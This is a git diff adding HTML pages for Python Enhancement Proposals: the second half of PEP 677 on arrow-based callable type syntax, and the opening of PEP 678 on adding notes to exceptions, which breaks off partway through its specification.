Unlike in TypeScript and Kotlin, these names are part of the type if +provided - any function implementing the type must use the same names. +This is similar to the extended syntax proposal we describe in our +Rejected Alternatives section.

+
+
+

Function Definitions vs Callable Type Annotations

+

In all of the languages listed above, type annotations for function +definitions use a : rather than a ->. For example, in TypeScript +a higher-order function looks like this:

+
function higher_order(fn: (a: string) => string): string {
+  return fn("Hello, World");
+}
+
+
+

Scala and Kotlin use essentially the same : syntax for return +annotations. The : makes sense in these languages because they +all use : for type annotations of +parameters and variables, and the use for function return types is +similar.

+

In Python we use : to denote the start of a function body and +-> for return annotations. As a result, even though our proposal +is superficially the same as these other languages the context is +different. There is potential for more confusion in Python when +reading function definitions that include callable types.

+

This is a key concern for which we are seeking feedback with our draft +PEP; one idea we have floated is to use => instead to make it easier +to differentiate.

+
+
+

The ML Language Family

+

Languages in the ML family, including F#, +OCaml, +and Haskell, all use +-> to represent function types. All of them use a parentheses-free +syntax with multiple arrows, for example in Haskell:

+
Integer -> String -> Bool
+
+
+

The use of multiple arrows, which differs from our proposal, makes +sense for languages in this family because they use automatic +currying of function arguments, +which means that a multi-argument function behaves like a single-argument +function returning a function.

+
+
+
+
+

Specification

+
+

Typing Behavior

+

Type checkers should treat the new syntax with exactly the same +semantics as typing.Callable.

+

As such, a type checker should treat the following pairs exactly the +same:

+
from typing import Awaitable, Callable, Concatenate, ParamSpec, TypeVarTuple
+
+P = ParamSpec("P")
+Ts = TypeVarTuple('Ts')
+
+f0: () -> bool
+f0: Callable[[], bool]
+
+f1: (int, str) -> bool
+f1: Callable[[int, str], bool]
+
+f2: (...) -> bool
+f2: Callable[..., bool]
+
+f3: async (str) -> str
+f3: Callable[[str], Awaitable[str]]
+
+f4: (**P) -> bool
+f4: Callable[P, bool]
+
+f5: (int, **P) -> bool
+f5: Callable[Concatenate[int, P], bool]
+
+f6: (*Ts) -> bool
+f6: Callable[[*Ts], bool]
+
+f7: (int, *Ts, str) -> bool
+f7: Callable[[int, *Ts, str], bool]
+
+
+
+
+

Grammar and AST

+

The proposed new syntax can be described by these AST changes to Parser/Python.asdl:

+
expr = <prexisting_expr_kinds>
+     | AsyncCallableType(callable_type_arguments args, expr returns)
+     | CallableType(callable_type_arguments args, expr returns)
+
+callable_type_arguments = AnyArguments
+                        | ArgumentsList(expr* posonlyargs)
+                        | Concatenation(expr* posonlyargs, expr param_spec)
+
+
+

Here are our proposed changes to the Python Grammar +(https://docs.python.org/3/reference/grammar.htm):

+
expression:
+    | disjunction disjunction 'else' expression
+    | callable_type_expression
+    | disjunction
+    | lambdef
+
+callable_type_expression:
+    | callable_type_arguments '->' expression
+    | ASYNC callable_type_arguments '->' expression
+
+callable_type_arguments:
+    | '(' '...' [','] ')'
+    | '(' callable_type_positional_argument*  ')'
+    | '(' callable_type_positional_argument* callable_type_param_spec ')'
+
+callable_type_positional_argument:
+    | !'...' expression ','
+    | !'...' expression &')'
+
+callable_type_param_spec:
+    | '**' expression ','
+    | '**' expression &')'
+
+
+

If PEP 646 is accepted, we intend to include support for unpacked +types in two ways. To support the “star-for-unpack” syntax proposed in +PEP 646, we will modify the grammar for +callable_type_positional_argument as follows:

+
callable_type_positional_argument:
+    | !'...' expression ','
+    | !'...' expression &')'
+    | '*' expression ','
+    | '*' expression &')'
+
+
+

With this change, a type of the form (int, *Ts) -> bool should +evaluate to the AST form:

+
CallableType(
+    ArgumentsList(Name("int"), Starred(Name("Ts"))),
+    Name("bool")
+)
+
+
+

and be treated by type checkers as equivalent to Callable[[int, +*Ts], bool] or Callable[[int, Unpack[Ts]], bool].

+
+
+

Implications of the Grammar

+
+

Precedence of ->

+

-> binds less tightly than other operators, both inside types and +in function signatures, so the following two callable types are +equivalent:

+
(int) -> str | bool
+(int) -> (str | bool)
+
+
+

-> associates to the right, both inside types and in function +signatures. So the following pairs are equivalent:

+
(int) -> (str) -> bool
+(int) -> ((str) -> bool)
+
+def f() -> (int, str) -> bool: pass
+def f() -> ((int, str) -> bool): pass
+
+def f() -> (int) -> (str) -> bool: pass
+def f() -> ((int) -> ((str) -> bool)): pass
+
+
+

Because operators bind more tightly than ->, parentheses are +required whenever an arrow type is intended to be inside an argument +to an operator like |:

+
(int) -> () -> int | () -> bool      # syntax error!
+(int) -> (() -> int) | (() -> bool)  # okay
+
+
+

We discussed each of these behaviors and believe they are desirable:

+
    +
  • Union types (represented by A | B according to PEP 604) are +valid in function signature returns, so we need to allow operators +in the return position for consistency.
  • +
  • Given that operators bind more tightly than -> it is correct +that a type like bool | () -> bool must be a syntax error. We +should be sure the error message is clear because this may be a +common mistake.
  • +
  • Associating -> to the right, rather than requiring explicit +parentheses, is consistent with other languages like TypeScript and +respects the principle that valid expressions should normally be +substitutable when possible.
  • +
+
+
+

async Keyword

+

All of the binding rules still work for async callable types:

+
(int) -> async (float) -> str | bool
+(int) -> (async (float) -> (str | bool))
+
+def f() -> async (int, str) -> bool: pass
+def f() -> (async (int, str) -> bool): pass
+
+def f() -> async (int) -> async (str) -> bool: pass
+def f() -> (async (int) -> (async (str) -> bool)): pass
+
+
+
+
+

Trailing Commas

+
    +
  • Following the precedent of function signatures, putting a comma in +an empty arguments list is illegal: (,) -> bool is a syntax +error.
  • +
  • Again following precedent, trailing commas are otherwise always +permitted:
    ((int,) -> bool) == ((int) -> bool)
    +((int, **P,) -> bool) == ((int, **P) -> bool)
    +((...,) -> bool) == ((...) -> bool)
    +
    +
    +
  • +
+

Allowing trailing commas also gives autoformatters more flexibility +when splitting callable types across lines, which is always legal +following standard Python whitespace rules.

+
+
+

Disallowing ... as an Argument Type

+

Under normal circumstances, any valid expression is permitted where we +want a type annotation and ... is a valid expression. This is +never semantically valid and all type checkers would reject it, but +the grammar would allow it if we did not explicitly prevent this.

+

Since ... is meaningless as a type and there are usability +concerns, our grammar rules it out and the following is a syntax +error:

+
(int, ...) -> bool
+
+
+

We decided that there were compelling reasons to do this:

+
    +
  • The semantics of (...) -> bool are different from (T) -> bool +for any valid type T: (...) is a special form indicating +AnyArguments whereas T is a type parameter in the arguments +list.
  • +
  • ... is used as a placeholder default value to indicate an +optional argument in stubs and callback protocols. Allowing it in +the position of a type could easily lead to confusion and possibly +bugs due to typos.
  • +
  • In the tuple generic type, we special-case ... to mean +“more of the same”, e.g. a tuple[int, ...] means a tuple with +one or more integers. We do not use ... in a similar way +in callable types, so to prevent misunderstandings it makes sense +to prevent this.
  • +
+
+
+

Incompatibility with other possible uses of * and **

+

The use of **P for supporting PEP 612 ParamSpec rules out any +future proposal using a bare **<some_type> to type +kwargs. This seems acceptable because:

+
    +
  • If we ever do want such a syntax, it would be clearer to require an +argument name anyway. This would also make the type look more +similar to a function signature. In other words, if we ever support +typing kwargs in callable types, we would prefer (int, +**kwargs: str) rather than (int, **str).
  • +
  • PEP 646 unpacking syntax would rule out using *<some_type> for +args. The kwargs case is similar enough that this rules out +a bare **<some_type> anyway.
  • +
+
+
+

Compatibility with Arrow-Based Lambda Syntax

+

To the best of our knowledge there is no active discussion of +arrow-style lambda syntax, but it is nonetheless +worth considering what possibilities would be ruled out by adopting +this proposal.

+

It would be incompatible with this proposal to adopt the same +parenthesized ->-based arrow syntax for lambdas, e.g. (x, y) -> +x + y for lambda x, y: x + y.

+

Our view is that if we want arrow syntax for lambdas in the future, it +would be a better choice to use =>, e.g. (x, y) => x + y. +Many languages use the same arrow token for both lambdas and callable +types, but Python is unique in that types are expressions and have to +evaluate to runtime values. Our view is that this merits using +separate tokens, and given the existing use of -> for return types +in function signatures it would be more coherent to use -> for +callable types and => for lambdas.

+
+
+
+

Runtime Behavior

+

The new AST nodes need to evaluate to runtime types, and we have two goals for the +behavior of these runtime types:

+
    +
  • They should expose a structured API that is descriptive and powerful +enough to be compatible with extending the type to include new features +like named and variadic arguments.
  • +
  • They should also expose an API that is backward-compatible with +typing.Callable.
  • +
+
+

Evaluation and Structured API

+

We intend to create new builtin types to which the new AST nodes will +evaluate, exposing them in the types module.

+

Our plan is to expose a structured API as if they were defined as follows:

+
class CallableType:
+    is_async: bool
+    arguments: types.EllipsisType | tuple[CallableTypeArgument, ...]
+    return_type: object
+
+class CallableTypeArgument:
+    kind: CallableTypeArgumentKind
+    annotation: object
+
+@enum.global_enum
+class CallableTypeArgumentKind(enum.IntEnum):
+    POSITIONAL_ONLY: int = ...
+    PARAM_SPEC: int = ...
+
+
+

The evaluation rules are expressed in terms of the following +pseudocode:

+
def evaluate_callable_type(
+    callable_type: ast.CallableType | ast.AsyncCallableType,
+) -> CallableType:
+    return CallableType(
+       is_async=isinstance(callable_type, ast.AsyncCallableType),
+       arguments=_evaluate_arguments(callable_type.arguments),
+       return_type=evaluate_expression(callable_type.returns),
+    )
+
+def _evaluate_arguments(arguments):
+    match arguments:
+        case ast.AnyArguments():
+            return Ellipsis
+        case ast.ArgumentsList(posonlyargs):
+            return tuple(
+                _evaluate_arg(arg) for arg in posonlyargs
+            )
+        case ast.ArgumentsListConcatenation(posonlyargs, param_spec):
+            return (
+                *(_evaluate_arg(arg) for arg in posonlyargs),
+                _evaluate_arg(arg=param_spec, kind=PARAM_SPEC),
+            )
+
+def _evaluate_arg(arg, kind=POSITIONAL_ONLY):
+    return CallableTypeArgument(
+        kind=kind,
+        annotation=evaluate_expression(arg)
+    )
+
+
+
+
+

Backward-Compatible API

+

To get backward compatibility with the existing typing.Callable API, +which relies on fields __args__ and __parameters__, we can define +them as if they were written in terms of the following:

+
import typing
+
+def get_args(t: CallableType) -> tuple[object]:
+    return_type_arg = (
+        typing.Awaitable[t.return_type]
+        if t.is_async
+        else t.return_type
+    )
+    arguments = t.arguments
+    if arguments is Ellipsis:
+        argument_args = (Ellipsis,)
+    else:
+        argument_args = (arg.annotation for arg in arguments)
+    return (
+        *argument_args,
+        return_type_arg
+    )
+
+def get_parameters(t: CallableType) -> tuple[object]:
+    out = []
+    for arg in get_args(t):
+        if isinstance(arg, typing.ParamSpec):
+            out.append(arg)
+        else:
+            out.extend(arg.__parameters__)
+    return tuple(out)
+
+
+
+
+

Additional Behaviors of types.CallableType

+

As with the A | B syntax for unions introduced in PEP 604:

+
    +
  • The __eq__ method should treat equivalent typing.Callable +values as equal to values constructed using the builtin syntax, and +otherwise should behave like the __eq__ of typing.Callable.
  • +
  • The __repr__ method should produce an arrow syntax representation that, +when evaluated, gives us back an equal types.CallableType instance +(see the sketch below).
  • +
+
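
A minimal sketch of both behaviors, written in the proposed (never implemented) syntax:

+
from typing import Callable
+
+t = (int, str) -> bool                   # hypothetical: uses this PEP's syntax
+assert t == Callable[[int, str], bool]   # __eq__ treats the two forms as equal
+assert eval(repr(t)) == t                # repr() round-trips through arrow syntax
+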
+
+
+
+

Rejected Alternatives

+

Many of the alternatives we considered would have been more expressive +than typing.Callable, for example adding support for describing +signatures that include named, optional, and variadic arguments.

+

To determine which features we most needed to support with a callable +type syntax, we did an extensive analysis of existing projects:

+ +

We decided on a simple proposal with improved syntax for the existing +Callable type because the vast majority of callbacks can be correctly +described by the existing typing.Callable semantics:

+
    +
  • Positional parameters: By far the most important case to handle well +is simple callable types with positional parameters, such as +(int, str) -> bool
  • +
  • ParamSpec and Concatenate: The next most important feature is good +support for PEP 612 ParamSpec and Concatenate types like +(**P) -> bool and (int, **P) -> bool. These are common +primarily because of the heavy use of decorator patterns in python +code.
  • +
  • TypeVarTuples: The next most important feature, assuming PEP 646 is +accepted, is for unpacked types which are common because of cases +where a wrapper passes along *args to some other function.
  • +
+

Features that other, more complicated proposals would support account +for fewer than 2% of the use cases we found. These are already +expressible using callback protocols, and since they are uncommon we +decided that it made more sense to move forward with a simpler syntax.

+
+

Extended Syntax Supporting Named and Optional Arguments

+

Another alternative was for a compatible but more complex syntax that +could express everything in this PEP but also named, optional, and +variadic arguments. In this “extended” syntax proposal the following +types would have been equivalent:

+
class Function(typing.Protocol):
+    def __call__(self, x: int, /, y: float, *, z: bool = ..., **kwargs: str) -> bool:
+        ...
+
+Function = (int, y: float, *, z: bool = ..., **kwargs: str) -> bool
+
+
+

Advantages of this syntax include:

+
    +
  • Most of the advantages of the proposal in this PEP (conciseness, PEP 612 support, etc.)
  • +
  • The ability to handle named, optional, and variadic arguments
  • +

+

We decided against proposing it for the following reasons:

+
    +
  • The implementation would have been more difficult, and usage stats +demonstrate that fewer than 3% of use cases would benefit from any +of the added features.
  • +
  • The group that debated these proposals was split down the middle +about whether these changes are desirable:
      +
    • On the one hand, they make callable types more expressive. On the +other hand, they could easily confuse users who have not read the +full specification of callable type syntax.
    • +
    • We believe the simpler syntax proposed in this PEP, which +introduces no new semantics and closely mimics syntax in other +popular languages like Kotlin, Scala, and TypeScript, is much +less likely to confuse users.
    • +
    +
  • +
  • We intend to implement the current proposal in a way that is +forward-compatible with the more complicated extended syntax. If the +community decides after more experience and discussion that we want +the additional features, it should be straightforward to propose +them in the future.
  • +
  • Even a full extended syntax cannot replace the use of callback +protocols for overloads. For example, no closed form of callable type +could express a function that maps bools to bools and ints to floats, +like this callback protocol:
    from typing import overload, Protocol
    +
    +class OverloadedCallback(Protocol):
    +
    +  @overload
    +  def __call__(self, x: int) -> float: ...
    +
    +  @overload
    +  def __call__(self, x: bool) -> bool: ...
    +
    +  def __call__(self, x: int | bool) -> float | bool: ...
    +
    +
    +f: OverloadedCallback = ...
    +f(True)  # bool
    +f(3)     # float
    +
    +
    +
  • +
+

We confirmed that the current proposal is forward-compatible with +extended syntax by +implementing +a grammar and AST for this extended syntax on top of our reference +implementation of this PEP’s grammar.

+
+
+

Syntax Closer to Function Signatures

+

One alternative we had floated was a syntax much more similar to +function signatures.

+

In this proposal, the following types would have been equivalent:

+
class Function(typing.Protocol):
+    def __call__(self, x: int, /, y: float, *, z: bool = ..., **kwargs: str) -> bool:
+        ...
+
+Function = (x: int, /, y: float, *, z: bool = ..., **kwargs: str) -> bool
+
+
+

The benefits of this proposal would have included:

+
    +
  • Perfect syntactic consistency between signatures and callable types.
  • +
  • Support for more features of function signatures (named, optional, +variadic args) that this PEP does not support.
  • +
+

Key downsides that led us to reject the idea include the following:

+
    +
  • A large majority of use cases only use positional-only arguments. This +syntax would be more verbose for that use case, both because of requiring +argument names and an explicit /, for example (int, /) -> bool where +our proposal allows (int) -> bool
  • +
  • The requirement for explicit / for positional-only arguments has +a high risk of causing frequent bugs - which often would not be +detected by unit tests - where library authors would accidentally +use types with named arguments.
  • +
  • Our analysis suggests that support for ParamSpec is key, but the +scoping rules laid out in PEP 612 would have made this difficult.
  • +
+
+
+

Other Proposals Considered

+
+

Functions-as-Types

+

An idea we looked at very early on was to allow using functions as types. +The idea is to allow a function to stand in for its own call +signature, with roughly the same semantics as the __call__ method +of callback protocols:

+
def CallableType(
+    positional_only: int,
+    /,
+    named: str,
+    *args: float,
+    keyword_only: int = ...,
+    **kwargs: str
+) -> bool: ...
+
+f: CallableType = ...
+f(5, "name", 6.6, 6.7, keyword_only=6, x="hello", y="world")  # typechecks as bool
+
+
+

This may be a good idea, but we do not consider it a viable +replacement for callable types:

+
    +
  • It would be difficult to handle ParamSpec, which we consider a +critical feature to support.
  • +
  • When using functions as types, the callable types are not first-class +values. Instead, they require a separate, out-of-line function +definition to define a type alias.
  • +
  • It would not support more features than callback protocols, and seems +more like a shorter way to write them than a replacement for +Callable.
  • +
+
+
+

Hybrid keyword-arrow Syntax

+

In the Rust language, a keyword fn is used to indicate functions +in much the same way as Python’s def, and callable types are +indicated using a hybrid arrow syntax Fn(i64, String) -> bool.

+

We could use the def keyword in callable types for Python, for +example our two-parameter boolean function could be written as +def(int, str) -> bool. But we think this might confuse readers +into thinking def(A, B) -> C is a lambda, particularly because +JavaScript’s function keyword is used in both named and anonymous +functions.

+
+
+

Parenthesis-Free Syntax

+

We considered a parentheses-free syntax that would have been even more +concise:

+
int, str -> bool
+
+
+

We decided against it because this is not visually as similar to +existing function header syntax. Moreover, it is visually similar to +lambdas, which bind names with no parentheses: lambda x, y: x == +y.

+
+
+

Requiring Outer Parentheses

+

A concern with the current proposal is readability, particularly +when callable types are used in return type position which leads to +multiple top-level -> tokens, for example:

+
def make_adder() -> (int) -> int:
+    return lambda x: x + 1
+
+
+

We considered a few ideas to prevent this by changing rules about +parentheses. One was to move the parentheses to the outside, so +that a two-argument boolean function is written (int, str -> bool). +With this change, the example above becomes:

+
def make_adder() -> (int -> int):
+    return lambda x: x + 1
+
+
+

This makes the nesting clear in many examples that are otherwise difficult to +follow, but we rejected it because:

+
    +
  • Currently in Python commas bind very loosely, which means it might be common +to misread (int, str -> bool) as a tuple whose first element is an int, +rather than a two-parameter callable type.
  • +
  • It is not very similar to function header syntax, and one of our goals was +familiar syntax inspired by function headers.
  • +
  • This syntax may be more readable for deeply nested callables like the one +above, but deep nesting is not very common. Encouraging extra parentheses +around callable types in return position via a style guide would have most of +the readability benefit without the downsides.
  • +
+

We also considered requiring parentheses on both the parameter list and the +outside, e.g. ((int, str) -> bool). With this change, the example above +becomes:

+
def make_adder() -> ((int) -> int):
+    return lambda x: x + 1
+
+
+

We rejected this change because:

+
    +
  • The outer parentheses only help readability in some cases, mostly when a +callable type is used in return position. In many other cases they hurt +readability rather than helping.
  • +
  • We agree that it might make sense to encourage outer parentheses in several +cases, particularly callable types in function return annotations. But
      +
    • We believe it is more appropriate to encourage this in style guides, +linters, and autoformatters than to bake it into the parser and throw +syntax errors.
    • +
    • Moreover, if a type is complicated enough that readability is a concern +we can always use type aliases, for example:
      IntToIntFunction: (int) -> int
      +
      +def make_adder() -> IntToIntFunction:
      +    return lambda x: x + 1
      +
      +
      +
    • +
    +
  • +
+
+
+

Making -> bind tighter than |

+

In order to allow both -> and | tokens in type expressions we +had to choose precedence. In the current proposal, this is a function +returning an optional boolean:

+
(int, str) -> bool | None  # equivalent to (int, str) -> (bool | None)
+
+
+

We considered having -> bind tighter so that instead the expression +would parse as ((int, str) -> bool) | None. There are two advantages +to this:

+
    +
  • It means we would no longer have to treat None | (int, str) -> +bool as a syntax error.
  • +
  • Looking at typeshed today, optional callable arguments are very common +because using None as a default value is a standard Python idiom. +Having -> bind tighter would make these easier to write.
  • +
+

We decided against this for a few reasons:

+
    +
  • The function header def f() -> int | None: ... is legal +and indicates a function returning an optional int. To be consistent +with function headers, callable types should do the same.
  • +
  • TypeScript is the other popular language we know of that uses both +-> and | tokens in type expressions, and they have | bind +tighter. While we do not have to follow their lead, we prefer to do +so.
  • +
  • We do acknowledge that optional callable types are common and +having | bind tighter forces extra parentheses, which makes these +types harder to write. But code is read more often than written, and +we believe that requiring the outer parentheses for an optional callable +type like ((int, str) -> bool) | None is preferable for readability.
  • +
+
+
+

Introducing type-strings

+

Another idea was adding a new “special string” syntax and putting the type +inside of it, for example t"(int, str) -> bool". We rejected this +because it is not as readable, and seems out of step with guidance +from the Steering Council on ensuring that type expressions do not +diverge from the rest of Python’s syntax.

+
+
+

Improving Usability of the Indexed Callable Type

+

If we do not want to add new syntax for callable types, we could +look at how to make the existing type easier to read. One proposal +would be to make the builtin callable function indexable so +that it could be used as a type:

+
callable[[int, str], bool]
+
+
+

This change would be analogous to PEP 585, which made built-in collections +like list and dict usable as types, and would make imports +more convenient, but it wouldn’t do much for the readability of the types +themselves.

+

In order to reduce the number of brackets needed in complex callable +types, it would be possible to allow tuples for the argument list:

+
callable[(int, str), bool]
+
+
+

This actually is a significant readability improvement for +multi-argument functions, but the problem is that it makes callables +with one argument, which is the most common arity, hard to +write: because (x) evaluates to x, they would have to be +written like callable[(int,), bool]. We find this awkward.

+

Moreover, none of these ideas help as much with reducing verbosity +as the current proposal, nor do they introduce as strong a visual cue +as the -> between the parameter types and the return type.

+
+
+
+

Alternative Runtime Behaviors

+

The hard requirements on our runtime API are that:

+
    +
  • It must preserve backward compatibility with typing.Callable via +__args__ and __parameters__.
  • +
  • It must provide a structured API, which should be extensible if +in the future we try to support named and variadic arguments.
  • +
+
+

Alternative APIs

+

We considered having the runtime data types.CallableType use a +more structured API where there would be separate fields for +posonlyargs and param_spec. The current proposal was +inspired by the inspect.Signature type.

+

We use “argument” in our field and type names, unlike “parameter” +as in inspect.Signature, in order to avoid confusion with +the callable_type.__parameters__ field from the legacy API +that refers to type parameters rather than callable parameters.
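
As a purely hypothetical illustration (the class and field names below are our assumptions in the spirit of inspect.Signature, not the API specified in the separate runtime doc), a structured type along these lines could expose both the structured fields and the legacy flat view:

+
from dataclasses import dataclass
+from typing import Any
+
+@dataclass(frozen=True)
+class ArrowType:  # hypothetical name, not the PEP's types.CallableType spec
+    positional_only_arguments: tuple[Any, ...]
+    return_type: Any
+
+    @property
+    def __args__(self) -> tuple[Any, ...]:
+        # Legacy typing.Callable-style flat view for backward compatibility.
+        return (*self.positional_only_arguments, self.return_type)
+
+t = ArrowType(positional_only_arguments=(int, str), return_type=bool)
+assert t.__args__ == (int, str, bool)
+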

+
+
+

Using the plain return type in __args__ for async types

+

It is debatable whether we are required to preserve backward compatibility +of __args__ for async callable types like async (int) -> str. The +reason is that one could argue they are not expressible directly +using typing.Callable, and therefore it would be fine to set +__args__ as (int, str) rather than (int, typing.Awaitable[str]).

+

But we believe this would be problematic. By preserving the appearance +of a backward-compatible API while actually breaking its semantics on +async types, we would cause runtime type libraries that attempt to +interpret Callable using __args__ to fail silently.

+

It is for this reason that we automatically wrap the return type in +Awaitable.
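
Concretely, the equivalence being preserved is the one that already holds for typing.Callable:

+
from typing import Awaitable, Callable
+
+# async (int) -> str corresponds to this existing spelling, so its
+# backward-compatible __args__ should be (int, Awaitable[str]),
+# not the "plain" (int, str):
+AsyncCallback = Callable[[int], Awaitable[str]]
+print(AsyncCallback.__args__)  # (<class 'int'>, typing.Awaitable[str])
+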

+
+
+
+
+

Backward Compatibility

+

This PEP proposes a major syntax improvement over typing.Callable, +but the static semantics are the same.

+

As such, the only thing we need for backward compatibility is to +ensure that types specified via the new syntax behave the same as +equivalent typing.Callable and typing.Concatenate values they +intend to replace.

+

There is no particular interaction between this proposal and from +__future__ import annotations - just like any other type annotation +it will be unparsed to a string at module import, and +typing.get_type_hints should correctly evaluate the resulting +strings in cases where that is possible.
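
For illustration, this is how the existing machinery behaves with typing.Callable today; the new syntax is expected to flow through the same path:

+
from __future__ import annotations  # annotations are stored as strings
+
+import typing
+
+def apply(f: typing.Callable[[int], int], x: int) -> int:
+    return f(x)
+
+print(apply.__annotations__["f"])         # the raw, unevaluated string
+print(typing.get_type_hints(apply)["f"])  # typing.Callable[[int], int]
+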

+

This is discussed in more detail in the Runtime Behavior section.

+
+
+

Reference Implementation

+

We have a working implementation +of the AST and Grammar with tests verifying that the grammar proposed +here has the desired behaviors.

+

The runtime behavior is not yet implemented. As discussed in the +Runtime Behavior portion of the spec we have a detailed plan for +both a backward-compatible API and a more structured API in +a separate doc +where we are also open to discussion and alternative ideas.

+
+
+

Open Issues

+
+

Details of the Runtime API

+

We have attempted to provide a complete behavior specification in +the Runtime Behavior section of this PEP.

+

But there are probably more details that we will not realize we +need to define until we build a full reference implementation.

+
+
+

Optimizing SyntaxError messages

+

The current reference implementation has a fully-functional parser and +all edge cases presented here have been tested.

+

But there are some known cases where the errors are not as informative +as we would like. For example, because (int, ...) -> bool is +illegal but (int, ...) is a valid tuple, we currently produce a +syntax error flagging the -> as the problem even though the real +cause of the error is using ... as an argument type.

+

This is not part of the specification per se but is an important +detail to address in our implementation. The solution will likely +involve adding invalid_.* rules to python.gram and customizing +error messages.

+
+
+
+

Resources

+
+

Background and History

+

PEP 484 specifies +a very similar syntax for function type hint comments for use in +code that needs to work on Python 2.7. For example:

+
def f(x, y):
+    # type: (int, str) -> bool
+    ...
+
+
+

At that time we used indexing operations to specify generic types like +typing.Callable because we decided not to add syntax for +types. However, we have since begun to do so, e.g. with PEP 604.

+

Maggie proposed better callable type syntax as part of a larger +presentation on typing simplifications +at the PyCon Typing Summit 2021.

+

Steven brought up this proposal on typing-sig. +We had several meetings to discuss alternatives, and this presentation +led us to the current proposal.

+

Pradeep brought this proposal to python-dev +for feedback.

+
+
+

Acknowledgments

+

Thanks to the following people for their feedback on the PEP and help +planning the reference implementation:

+

Alex Waygood, Eric Traut, Guido van Rossum, James Hilton-Balfe, +Jelle Zijlstra, Maggie Moss, Tuomas Suutari, Shannon Zhu.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0677.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0678/index.html b/pep-0678/index.html new file mode 100644 index 00000000000..a862c59491a --- /dev/null +++ b/pep-0678/index.html @@ -0,0 +1,503 @@ + PEP 678 – Enriching Exceptions with Notes | peps.python.org +
+
+


+ + +
+
+
+

PEP 678 – Enriching Exceptions with Notes

+
+
Author:
+
Zac Hatfield-Dodds <zac at zhd.dev>
+
Sponsor:
+
Irit Katriel
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
654
+
Created:
+
20-Dec-2021
+
Python-Version:
+
3.11
+
Post-History:
+
27-Jan-2022
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at BaseException.add_note() and BaseException.__notes__.

+


+

See Enriching Exceptions with Notes for a user-focused tutorial.

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Exception objects are typically initialized with a message that describes the +error which has occurred. Because further information may be available when +the exception is caught and re-raised, or included in an ExceptionGroup, +this PEP proposes to add BaseException.add_note(note), a +.__notes__ attribute holding a list of notes so added, and to +update the builtin traceback formatting code to include notes in the formatted +traceback following the exception string.

+

This is particularly useful in relation to PEP 654 ExceptionGroups, +which make previous workarounds ineffective or confusing. Use cases have been +identified in the standard library, Hypothesis and cattrs packages, and +common code patterns with retries.

+
+
+

Motivation

+

When an exception is created in order to be raised, it is usually initialized +with information that describes the error that has occurred. There are cases +where it is useful to add information after the exception was caught. For +example,

+
    +
  • testing libraries may wish to show the values involved in a failing +assertion, or the steps to reproduce a failure (e.g. pytest and +hypothesis; example below).
  • +
  • code which retries an operation on error may wish to associate an iteration, +timestamp, or other explanation with each of several errors - especially if +re-raising them in an ExceptionGroup.
  • +
  • programming environments for novices can provide more detailed descriptions +of various errors, and tips for resolving them.
  • +
+

Existing approaches must pass this additional information around while keeping +it in sync with the state of raised, and potentially caught or chained, +exceptions. This is already error-prone, and made more difficult by PEP 654 +ExceptionGroups, so the time is right for a built-in solution. We +therefore propose to add:

+
    +
  • a new method BaseException.add_note(note: str),
  • +
  • BaseException.__notes__, a list of note strings added using +.add_note(), and
  • +
  • support in the builtin traceback formatting code such that notes are +displayed in the formatted traceback following the exception string.
  • +
+
+

Example usage

+
>>> try:
+...     raise TypeError('bad type')
+... except Exception as e:
+...     e.add_note('Add some information')
+...     raise
+...
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+TypeError: bad type
+Add some information
+>>>
+
+
+

When collecting exceptions into an exception group, we may want to add context +information for the individual errors. In the following example with +Hypothesis’ proposed support for ExceptionGroup, each exception +includes a note of the minimal failing example:

+
from hypothesis import given, strategies as st, target
+
+@given(st.integers())
+def test(x):
+    assert x < 0
+    assert x > 0
+
+
++ Exception Group Traceback (most recent call last):
+|   File "test.py", line 4, in test
+|     def test(x):
+|
+|   File "hypothesis/core.py", line 1202, in wrapped_test
+|     raise the_error_hypothesis_found
+|     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+| ExceptionGroup: Hypothesis found 2 distinct failures.
++-+---------------- 1 ----------------
+    | Traceback (most recent call last):
+    |   File "test.py", line 6, in test
+    |     assert x > 0
+    |     ^^^^^^^^^^^^
+    | AssertionError: assert -1 > 0
+    |
+    | Falsifying example: test(
+    |     x=-1,
+    | )
+    +---------------- 2 ----------------
+    | Traceback (most recent call last):
+    |   File "test.py", line 5, in test
+    |     assert x < 0
+    |     ^^^^^^^^^^^^
+    | AssertionError: assert 0 < 0
+    |
+    | Falsifying example: test(
+    |     x=0,
+    | )
+    +------------------------------------
+
+
+
+
+

Non-goals

+

Tracking multiple notes as a list, rather than by concatenating strings when +notes are added, is intended to maintain the distinction between the +individual notes. This might be required in specialized use cases, such +as translation of the notes by packages like friendly-traceback.

+

However, __notes__ is not intended to carry structured data. If your +note is for use by a program rather than display to a human, we recommend +instead (or additionally) choosing a convention for an attribute, e.g. +err._parse_errors = ... on the error or ExceptionGroup.

+

As a rule of thumb, we suggest that you should prefer exception chaining when the +error is going to be re-raised or handled as an individual error, and prefer +.add_note() when you want to avoid changing the exception type or +are collecting multiple exception objects to handle together. [1]

+
+
+
+

Specification

+

BaseException gains a new method .add_note(note: str). If note is +a string, .add_note(note) appends it to the __notes__ list, creating +the attribute if it does not already exist. If note is not a string, +.add_note() raises TypeError.
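
A runnable illustration of this behavior (Python 3.11 and later):

+
try:
+    raise ValueError("bad value")
+except ValueError as err:
+    err.add_note("while processing row 3")
+    err.add_note("in file data.csv")  # notes accumulate in order
+    print(err.__notes__)  # ['while processing row 3', 'in file data.csv']
+    try:
+        err.add_note(42)  # non-string notes are rejected
+    except TypeError as bad:
+        print(bad)
+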

+

Libraries may clear existing notes by modifying or deleting the __notes__ +list, if it has been created, including clearing all notes with +del err.__notes__. This allows full control over the attached notes, +without overly complicating the API or adding multiple names to +BaseException.__dict__.

+

When an exception is displayed by the interpreter’s builtin traceback-rendering code, +its notes (if there are any) appear immediately after the exception message, in the order +in which they were added, with each note starting on a new line.

+

If __notes__ has been created, BaseExceptionGroup.subgroup and +BaseExceptionGroup.split create a new list for each new instance, containing +the same contents as the original exception group’s __notes__.
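
For example (runnable on Python 3.11 and later):

+
eg = ExceptionGroup("group", [ValueError("v"), TypeError("t")])
+eg.add_note("collected during retry 2")
+
+match, rest = eg.split(ValueError)
+print(match.__notes__)                      # ['collected during retry 2']
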